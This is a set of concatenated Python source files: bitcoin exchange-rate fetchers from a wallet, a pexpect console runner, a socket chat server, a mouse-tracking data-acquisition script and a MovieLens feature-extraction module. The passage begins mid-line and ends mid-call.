if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('coinbase.com',
'/api/v1/currencies/exchange_rates')
return dict([(r[7:].upper(), Decimal(json[r]))
for r in json if r.startswith('btc_to_')])
class CoinDesk(ExchangeBase):
def get_currencies(self):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
return [d['currency'] for d in dicts]
def get_rates(self, ccy):
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
result = {ccy: Decimal(json['bpi'][ccy]['rate_float'])}
return result
def history_starts(self):
return { 'USD': '2012-11-30', 'EUR': '2013-09-01' }
def history_ccys(self):
return self.history_starts().keys()
def request_history(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice'] / 100.0 )}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY']
pairs = ['XBT%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
def history_ccys(self):
return ['BRL']
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.unocoin.com', 'trade?buy')
return {'INR': Decimal(json)}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price'] / 100.0)}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from electrum.util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
pexpect_runner.py
|
#!/usr/bin/env python3
import sys
import pexpect
import os
import threading
import signal
import time
import queue as Queue  # Python 3 module name, aliased to the old name used below
import wx
import PexpectRunnerConsolImpl
def sighandler(signum, frame):
# print "Signaled: %d" %signum
if signum == signal.SIGCHLD:
sys.exit(1)
else:
text_queue.put("SIGQUIT")
def process_poller():
# command to run is arguments 2->end
global exitThread
command = " ".join(sys.argv[3:])
print("Running command %s" % command)
child = pexpect.spawn(command)
logfd = open(sys.argv[1], "w")
child.logfile = logfd
logfd.write('%s: Running command "%s"\n' % (sys.argv[0], command))
time.sleep(2)
while True:
try:
child.expect("\r\n", timeout=1)
if exitThread:
child.kill(signal.SIGINT)
child.wait()
break
if len(child.before):
text_queue.put(child.before)
except pexpect.EOF:
text_queue.put("**EXIT**")
break
except pexpect.TIMEOUT:
if exitThread:
child.kill(signal.SIGINT)
child.wait()
break
if len(child.before):
text_queue.put(child.before)
def poll_text():
# check queue
try:
while True:
msg = text_queue.get(block=False)
if msg == "SIGQUIT":
consol.Close()
return
else:
consol.TextCtrlConsol.AppendText(msg + "\n\n")
text_queue.task_done()
except Queue.Empty:
pass
# reschedule
wx.CallLater(100, poll_text)
def main(argv=None):
# argument list
# 0 = binary (pexpect_runner.py)
# 1 = log file
# 2 = title for window
# 3... = binary to run
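    # Example invocation (illustrative only; the log path, window title and
    # command are placeholders):
    #   ./pexpect_runner.py /tmp/build.log "Build console" make -j4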
app = wx.App(False)
global consol
consol = PexpectRunnerConsolImpl.PexpectRunnerImpl(None)
consol.SetTitle(sys.argv[2])
consol.Show(True)
global exitThread
exitThread = False
global text_queue
text_queue = Queue.Queue()
poller_thread = threading.Thread(target=process_poller)
poller_thread.start()
# register signal handler
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGTERM, sighandler)
signal.signal(signal.SIGCHLD, sighandler)
    wx.CallLater(1, poll_text)  # "1L" is Python 2 syntax; plain int under Python 3
app.MainLoop()
exitThread = True
# start poller thread
poller_thread.join()
if __name__ == "__main__":
sys.exit(main())
|
servidorPYCHAT.py
|
import socket
import threading
import sys
import pickle
class Servidor():
"""docstring for Servidor"""
def __init__(self, host="localhost", port=4000):
self.clientes = []
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((str(host), int(port)))
self.sock.listen(10)
self.sock.setblocking(False)
aceptar = threading.Thread(target=self.aceptarCon)
procesar = threading.Thread(target=self.procesarCon)
aceptar.daemon = True
aceptar.start()
procesar.daemon = True
procesar.start()
print("chequeo completo \n sistema OK....")
while True:
msg = input('->')
if msg == 'salir':
self.sock.close()
sys.exit()
else:
pass
def msg_to_all(self, msg, cliente):
for c in self.clientes:
try:
if c != cliente:
c.send(msg)
except:
self.clientes.remove(c)
def aceptarCon(self):
print("aceptarCon iniciado")
while True:
try:
conn, addr = self.sock.accept()
conn.setblocking(False)
self.clientes.append(conn)
except:
pass
def procesarCon(self):
print("ProcesarCon iniciado")
while True:
if len(self.clientes) > 0:
for c in self.clientes:
try:
data = c.recv(1024)
if data:
self.msg_to_all(data,c)
except:
pass
s = Servidor()
|
fmos_spontaneous.py
|
'''
FMOS Spontaneous - Freely Moving Olfactory Search - RECORDS SPONTANEOUS BEHAVIOR
Written: Teresa Findley, tfindley@uoregon.edu
Last Updated: 04.26.2021
--Records tracking data via OSC communication with custom code in Bonsai (open source computer vision software -- https://bonsai-rx.org/)
--Records signal data through NI USB-6009 data acquisition board
--Controls solenoid and beambreak hardware through Arduino Mega2560 & Teensyduino 2.0
'''
# [SET UP] #
##IMPORTS
##libraries
import numpy as np, cv2, os
import time, math, random, datetime
from timeit import default_timer as timer
import OSC, threading, Queue
import nidaqmx, ctypes
import matplotlib.pyplot as plt
from nidaqmx.constants import AcquisitionType, Edge
from nidaqmx.stream_readers import AnalogMultiChannelReader
##local modules
from fmos_preferences_bonsai import *
import fmos_datamgt, fmos_tracking, fmos_serial
##INITIATE VARIABLES -- these are all state machine variables to be used throughout the session
session_num = 1;
datapath,session_num = fmos_datamgt.CHK_directory(mouse_id,group_name,session_num) #update/create datapath
trialsummary_file = datapath + 'trialsummary.txt'; video_file = datapath + 'videolocation.txt'
notes_file = datapath + 'notes.txt'
ch0_file = datapath + ch0 + '.dat'; ch1_file = datapath + ch1 + '.dat' #NI signal files
ch2_file = datapath + ch2 + '.dat'; ch3_file = datapath + ch3 + '.dat'
nx_file = datapath + 'nosex.dat'; ny_file = datapath + 'nosey.dat' #bonsai tracking files
hx_file = datapath + 'headx.dat'; hy_file = datapath + 'heady.dat'
cx_file = datapath + 'comx.dat'; cy_file = datapath + 'comy.dat'
ts_file = datapath + 'timestamp.dat'
receive_address = ('localhost', 6666); trackingcoords = OSC.OSCServer(receive_address); #bonsai tracking variables
qnosex = Queue.LifoQueue(0); qnosey = Queue.LifoQueue(0); #online position storage
nosex = np.zeros((1,1)); nosey = np.zeros((1,1));
headx = np.zeros((1,1)); heady = np.zeros((1,1))
comx = np.zeros((1,1)); comy = np.zeros((1,1))
ts = np.zeros((1,1));
signaldata = np.zeros((channel_num,buffersize),dtype=np.float64) #NI data collection reading variables
reader = AnalogMultiChannelReader(ni_data.in_stream)
#Session Summary
#Create/Open Data Files
ch0_handle = open(ch0_file,'ab'); ch1_handle = open(ch1_file,'ab'); ch2_handle = open(ch2_file,'ab'); ch3_handle = open(ch3_file,'ab');
nx_handle = open(nx_file,'ab'); ny_handle = open(ny_file,'ab'); hx_handle = open(hx_file,'ab') #nx nose coord, h head coord, c center of mass
hy_handle = open(hy_file,'ab'); cx_handle = open(cx_file,'ab'); cy_handle = open(cy_file,'ab')
ts_handle = open(ts_file,'ab') #time stamp
#Bonsai Start Up
trackingcoords.addDefaultHandlers() #add default handlers to the server
def msg_handler(addr, tags, coords, source):
qnosex.put(coords[0]); qnosey.put(coords[1]); #online storage of nose position
nosex[0,0] = coords[0]; nosey[0,0] = coords[1]
headx[0,0] = coords[2]; heady[0,0] = coords[3]
comx[0,0] = coords[4]; comy[0,0] = coords[5]
ts[0,0] = timer()-session_start;
nosex.tofile(nx_handle); nosey.tofile(ny_handle)
headx.tofile(hx_handle); heady.tofile(hy_handle)
comx.tofile(cx_handle); comy.tofile(cy_handle)
ts.tofile(ts_handle)
trackingcoords.addMsgHandler("/2python",msg_handler) #add msg handler function to server
bonsaitracking = threading.Thread( target = trackingcoords.serve_forever ) #put server in parallel thread
bonsaitracking.daemon = True
#NI Set Up
ni_data.ai_channels.add_ai_voltage_chan(channels) #add channels to server
ni_data.timing.cfg_samp_clk_timing(samplingrate, '',Edge.RISING,AcquisitionType.CONTINUOUS,uInt64(buffersize)) #instruct how to sample
def ni_handler(): #define background function to handle incoming NI data
while True:
reader.read_many_sample(signaldata,number_of_samples_per_channel= buffersize, timeout=10.0)
signaldata[0,:].tofile(ch0_handle); signaldata[1,:].tofile(ch1_handle);
signaldata[2,:].tofile(ch2_handle); signaldata[3,:].tofile(ch3_handle);
nisignal = threading.Thread(target = ni_handler) #set handler function in background
nisignal.daemon = True
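#NOTE: every .dat file written here is a headerless float64 stream (numpy tofile).
#A minimal offline read-back sketch, assuming the default float64 dtype used above:
#   import numpy as np
#   nosex_trace = np.fromfile(datapath + 'nosex.dat', dtype=np.float64)
#   ch0_trace = np.fromfile(ch0_file, dtype=np.float64)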
##INITIATE SESSION
print "Subject " + str(mouse_id) + ", Session " + str(session_num) #report session initiation
print "System Ready. Initiating Data Collection..."
session_start = timer() #provisional stamp so msg_handler (running in the OSC thread) never sees an undefined name
bonsaitracking.start();
nose = [qnosex.get(),qnosey.get()]; #block until Bonsai delivers the first coordinate packet
session_start = timer() #session timer (re-stamped once tracking is confirmed live)
ni_data.start(); nisignal.start(); #start data collection
localtime = datetime.datetime.now(); #stamp for video locator
print "Session Started."
# [MAIN CODE] #
while True:
# [State *](occurs in all states)
#Nosepoke & Timer
if timer() - session_start >= session_length:
break
if show_active_stats: #real-time trial statistics -- not necessary for spontaneous behavior, but still available for early session termination
frame = cv2.imread('D:/FMON_Project/data/statsbackground.jpeg')
height, width, depth = frame.shape #white background
cv2.imshow('Select this window to manually end session',frame)
##Manual Session Termination
if cv2.waitKey(1) & 0xFF == ord('q'):
reasonforend = "Manual Exit"
break
# [SHUT DOWN] #
print "Session Ended." #report end of session
notepad = str(input("Please record notes here. Be precise and thorough. Write inside quotation marks with no space at the end.")) + '\n'
ch0_handle.close();ch1_handle.close();ch2_handle.close();ch3_handle.close();
nx_handle.close();ny_handle.close();hx_handle.close();hy_handle.close();cx_handle.close();cy_handle.close(); ts_handle.close()
print "Data Collection Ended" #report end of data collection
performance_report = '0'
fmos_datamgt.write_vidlocator(video_file,localtime)
fmos_datamgt.record_notes(notes_file,session_num,localtime,notepad, performance_report)
movielens.py
import logging
import random
import threading
from datetime import datetime
import numpy as np
from scipy import sparse
from sklearn.preprocessing import MinMaxScaler
from .utils import Indexer, create_sparse, timestamp_delta_generator
rating_threshold = 4
actor_threshold = 3
def generate_indexer(user_rates_movies_ds, user_tags_movies_ds, movie_actor_ds,
movie_director_ds, movie_genre_ds, movie_countries_ds, feature_begin, feature_end):
logging.info('generating indexer ...')
min_time = 1e30
max_time = -1
indexer = Indexer(['user', 'tag', 'movie', 'actor', 'director', 'genre', 'country'])
for line in user_rates_movies_ds[1:]:
line_items = line.split('\t')
rating_timestamp = float(line_items[3]) / 1000
min_time = min(min_time, rating_timestamp)
max_time = max(max_time, rating_timestamp)
rating = float(line_items[2])
if feature_begin < rating_timestamp <= feature_end and rating > rating_threshold:
indexer.index('user', line_items[0])
indexer.index('movie', line_items[1])
for line in user_tags_movies_ds[1:]:
line_items = line.split('\t')
tag_timestamp = float(line_items[3]) / 1000
if feature_begin < tag_timestamp <= feature_end:
indexer.index('user', line_items[0])
indexer.index('movie', line_items[1])
indexer.index('tag', line_items[2])
for line in movie_actor_ds[1:]:
line_items = line.split('\t')
ranking = int(line_items[3])
if ranking < actor_threshold and line_items[0] in indexer.mapping['movie']:
indexer.index('actor', line_items[1])
for line in movie_director_ds[1:]:
line_items = line.split('\t')
if line_items[0] in indexer.mapping['movie']:
indexer.index('director', line_items[1])
for line in movie_genre_ds[1:]:
line_items = line.split('\t')
if line_items[0] in indexer.mapping['movie']:
indexer.index('genre', line_items[1])
for line in movie_countries_ds[1:]:
line_items = line.split('\t')
if line_items[0] in indexer.mapping['movie']:
indexer.index('country', line_items[1])
with open('data/movielens/metadata.txt', 'w') as output:
output.write('Nodes:\n')
output.write('-----------------------------\n')
output.write('#Users: %d\n' % indexer.indices['user'])
output.write('#Tags: %d\n' % indexer.indices['tag'])
output.write('#Movies: %d\n' % indexer.indices['movie'])
output.write('#Actors: %d\n' % indexer.indices['actor'])
output.write('#Directors: %d\n' % indexer.indices['director'])
output.write('#Genres: %d\n' % indexer.indices['genre'])
output.write('#Countries: %d\n' % indexer.indices['country'])
output.write('\nEdges:\n')
output.write('-----------------------------\n')
output.write('#Rate: %d\n' % len(user_rates_movies_ds))
output.write('#Attach: %d\n' % len(user_tags_movies_ds))
output.write('#Played_by: %d\n' % len(movie_actor_ds))
output.write('#Directed_by : %d\n' % len(movie_director_ds))
output.write('#Has: %d\n' % len(movie_genre_ds))
output.write('#Produced_in: %d\n' % len(movie_countries_ds))
output.write('\nTime Span:\n')
output.write('-----------------------------\n')
output.write('From: %s\n' % datetime.fromtimestamp(min_time))
output.write('To: %s\n' % datetime.fromtimestamp(max_time))
return indexer
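# NOTE: Indexer is imported from .utils and not shown here; from its usage above it is
# assumed to expose index(node_type, key) for assigning dense integer ids,
# get_index(node_type, key) for lookup (None for unseen keys), an `indices` dict of
# per-type counts and a `mapping` dict of per-type key->id tables. A rough sketch of
# that assumed contract, for reference only:
#   indexer = Indexer(['user', 'movie'])
#   uid = indexer.index('user', '75')      # create-or-get a dense id
#   uid = indexer.get_index('user', '75')  # lookup only; None if never indexed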
def parse_dataset(user_rates_movies_ds,
user_tags_movies_ds, movie_actor_ds, movie_director_ds, movie_genre_ds,
movie_countries_ds, feature_begin, feature_end, indexer):
logging.info('parsing dataset ...')
rate = []
attach = []
played_by = []
directed_by = []
has = []
produced_in = []
# while parsing the ratings dataset we extract the user-movie rating
# relationships occurring in the feature extraction window
for line in user_rates_movies_ds[1:]: # skipping the first line (header) of the dataset
line_items = line.split('\t')
# the timestamp in the dataset is represented in milliseconds, so
# we divide by 1000 to convert it to seconds
rating = float(line_items[2])
rating_timestamp = float(line_items[3]) / 1000
if feature_begin < rating_timestamp <= feature_end and rating > rating_threshold:
user = indexer.get_index('user', line_items[0])
movie = indexer.get_index('movie', line_items[1])
rate.append((user, movie))
# while parsing the user_taggedmovies dataset we extract the tag-movie
# relationships occurring in the feature extraction window
for line in user_tags_movies_ds[1:]:
line_items = line.split('\t')
assign_time = float(line_items[3]) / 1000
if feature_begin < assign_time <= feature_end:
movie = indexer.get_index('movie', line_items[1])
tag = indexer.get_index('tag', line_items[2])
attach.append((tag, movie))
for line in movie_actor_ds[1:]:
line_items = line.split('\t')
ranking = int(line_items[3])
if ranking < actor_threshold:
movie = indexer.get_index('movie', line_items[0])
actor = indexer.get_index('actor', line_items[1])
if not (movie is None or actor is None):
played_by.append((movie, actor))
for line in movie_director_ds[1:]:
line_items = line.split('\t')
movie = indexer.get_index('movie', line_items[0])
director = indexer.get_index('director', line_items[1])
if not (movie is None or director is None):
directed_by.append((movie, director))
for line in movie_genre_ds[1:]:
line_items = line.split('\t')
movie = indexer.get_index('movie', line_items[0])
genre = indexer.get_index('genre', line_items[1])
if not (movie is None or genre is None):
has.append((movie, genre))
for line in movie_countries_ds[1:]:
line_items = line.split('\t')
movie = indexer.get_index('movie', line_items[0])
country = indexer.get_index('country', line_items[1])
if not (movie is None or country is None):
produced_in.append((movie, country))
num_usr = indexer.indices['user']
num_tag = indexer.indices['tag']
num_movie = indexer.indices['movie']
num_actor = indexer.indices['actor']
num_directors = indexer.indices['director']
num_genre = indexer.indices['genre']
num_countries = indexer.indices['country']
rate_sparse = create_sparse(rate, num_usr, num_movie)
attach_sparse = create_sparse(attach, num_tag, num_movie)
played_by_sparse = create_sparse(played_by, num_movie, num_actor)
directed_by_sparse = create_sparse(directed_by, num_movie, num_directors)
has_genre_sparse = create_sparse(has, num_movie, num_genre)
produced_in_sparse = create_sparse(produced_in, num_movie, num_countries)
return rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse, has_genre_sparse, produced_in_sparse
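# NOTE: create_sparse (imported from .utils) is assumed to turn a list of (row, col)
# pairs into an n_rows x n_cols binary scipy.sparse adjacency matrix. A minimal sketch
# of such a helper (not necessarily the project's actual implementation):
#   def create_sparse(pairs, n_rows, n_cols):
#       rows = [r for r, _ in pairs]
#       cols = [c for _, c in pairs]
#       return sparse.csr_matrix((np.ones(len(pairs)), (rows, cols)), shape=(n_rows, n_cols))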
def sample_generator(usr_rates_movies_ds, observation_begin, observation_end, rate_sparse, indexer, censoring_ratio):
logging.info('generating samples ...')
U_M = rate_sparse
observed_samples = {}
for line in usr_rates_movies_ds[1:]:
line_items = line.split('\t')
rating = float(line_items[2])
rating_timestamp = float(line_items[3]) / 1000
if observation_begin < rating_timestamp <= observation_end and rating > rating_threshold:
u = indexer.get_index('user', line_items[0])
v = indexer.get_index('movie', line_items[1])
if not (u is None or v is None):
observed_samples[u, v] = rating_timestamp - observation_begin
nonzero = sparse.find(U_M)
set_observed = set([(u, v) for (u, v) in observed_samples] + [(u, v) for (u, v) in zip(nonzero[0], nonzero[1])])
censored_samples = {}
M = len(observed_samples) // ((1 / censoring_ratio) - 1)
user_list = [i for i in range(U_M.shape[0])]
movie_list = [i for i in range(U_M.shape[1])]
while len(censored_samples) < M:
i = random.randint(0, len(user_list) - 1)
j = random.randint(0, len(movie_list) - 1)
if i != j:
u = user_list[i]
v = movie_list[j]
if (u, v) not in set_observed:
censored_samples[u, v] = observation_end - observation_begin + 1
return observed_samples, censored_samples
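# NOTE on the sampling above: each observed (user, movie) pair stores the time elapsed
# from observation_begin to the rating, while censored pairs are random unobserved pairs
# assigned the full window length + 1, so downstream survival models can treat them as
# right-censored at the end of the observation window.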
def extract_features(rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse,
has_genre_sparse, produced_in_sparse, observed_samples, censored_samples):
logging.info('extracting ...')
num_metapaths = 11
MP = [None for _ in range(num_metapaths)]
events = [threading.Event() for _ in range(num_metapaths)]
MUM_sparse = rate_sparse.T.dot(rate_sparse)
def worker(i):
if i == 0:
MP[i] = rate_sparse.dot(played_by_sparse.dot(played_by_sparse.T))
logging.debug('0: U-M-A-M')
elif i == 1:
MP[i] = rate_sparse.dot(directed_by_sparse.dot(directed_by_sparse.T))
logging.debug('1: U-M-D-M')
elif i == 2:
MP[i] = rate_sparse.dot(has_genre_sparse.dot(has_genre_sparse.T))
logging.debug('2: U-M-G-M')
elif i == 3:
MP[i] = rate_sparse.dot(attach_sparse.T.dot(attach_sparse))
logging.debug('3: U-M-T-M')
elif i == 4:
MP[i] = rate_sparse.dot(produced_in_sparse.dot(produced_in_sparse.T))
logging.debug('4: U-M-C-M')
elif i == 5:
MP[i] = rate_sparse.dot(MUM_sparse)
logging.debug('5: U-M-U-M')
elif i == 6:
events[0].wait()
MP[i] = MP[0].dot(MUM_sparse)
logging.debug('6: U-M-A-M-U-M')
elif i == 7:
events[1].wait()
MP[i] = MP[1].dot(MUM_sparse)
logging.debug('7: U-M-D-M-U-M')
elif i == 8:
events[2].wait()
MP[i] = MP[2].dot(MUM_sparse)
logging.debug('8: U-M-G-M-U-M')
elif i == 9:
events[3].wait()
MP[i] = MP[3].dot(MUM_sparse)
logging.debug('9: U-M-T-M-U-M')
elif i == 10:
events[4].wait()
MP[i] = MP[4].dot(MUM_sparse)
logging.debug('10: U-M-C-M-U-M')
events[i].set()
threads = [threading.Thread(target=worker, args=(i,)) for i in range(num_metapaths)]
for t in threads:
t.start()
for t in threads:
t.join()
def get_features(p, q):
return [MP[i][p, q] for i in range(num_metapaths)]
X = []
Y = []
T = []
for (u, v) in observed_samples:
t = observed_samples[u, v]
fv = get_features(u, v)
X.append(fv)
Y.append(True)
T.append(t)
for (u, v) in censored_samples:
t = censored_samples[u, v]
fv = get_features(u, v)
X.append(fv)
Y.append(False)
T.append(t)
return np.array(X), np.array(Y), np.array(T)
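# NOTE: extract_features returns X with one column per meta-path count (11 columns, in
# the order the workers fill MP), Y as a boolean event indicator (True = observed rating,
# False = censored pair) and T as the matching time-to-event / censoring durations.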
def run(delta, observation_window, n_snapshots, censoring_ratio=0.5, single_snapshot=False):
logging.basicConfig(level=logging.INFO, format='%(asctime)s: %(message)s', datefmt='%H:%M:%S')
with open('data/movielens/user_ratedmovies-timestamps.dat') as user_rates_movies_ds:
user_rates_movies_ds = user_rates_movies_ds.read().splitlines()
with open('data/movielens/user_taggedmovies-timestamps.dat') as user_tags_movies_ds:
user_tags_movies_ds = user_tags_movies_ds.read().splitlines()
with open('data/movielens/movie_actors.dat', encoding='latin-1') as movie_actor_ds:
movie_actor_ds = movie_actor_ds.read().splitlines()
with open('data/movielens/movie_directors.dat', encoding='latin-1') as movie_director_ds:
movie_director_ds = movie_director_ds.read().splitlines()
with open('data/movielens/movie_genres.dat') as movie_genre_ds:
movie_genre_ds = movie_genre_ds.read().splitlines()
with open('data/movielens/movie_countries.dat') as movie_countries_ds:
movie_countries_ds = movie_countries_ds.read().splitlines()
delta = timestamp_delta_generator(months=delta)
observation_end = datetime(2009, 1, 1).timestamp()
observation_begin = observation_end - timestamp_delta_generator(months=observation_window)
feature_end = observation_begin
feature_begin = feature_end - n_snapshots * delta
indexer = generate_indexer(user_rates_movies_ds, user_tags_movies_ds, movie_actor_ds,
